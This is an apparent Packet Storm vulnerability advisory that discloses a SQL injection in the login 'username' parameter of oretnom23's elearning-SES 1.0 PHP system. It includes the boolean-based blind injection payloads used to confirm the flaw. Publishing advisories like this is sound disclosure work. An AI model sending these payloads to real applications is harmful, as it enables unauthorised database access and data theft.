Lucene search

K
packetstormNu11secur1tyPACKETSTORM:173003
HistoryJun 19, 2023 - 12:00 a.m.

elearning-SES 1.0 Sql Injection

2023-06-1900:00:00
nu11secur1ty
packetstormsecurity.com
187
elearning system
sql injection
oretnom23
web security
vulnerability
database theft
`## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 06.14.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://github.com/oretnom23/php-elearning-system  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The username parameter appears to be vulnerable to SQL injection  
attacks. The payloads 73152795' or 7515=7515-- and 13684562' or  
3996=3998-- were each submitted in the username parameter. These two  
requests resulted in different responses, indicating that the input is  
being incorporated into a SQL query in an unsafe way. The attacker can  
easily steal all information from the database of this system.  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)  
  
## Proof and Exploit:  
[href]()  
  
## Time spend:  
01:15:00  
  
  
`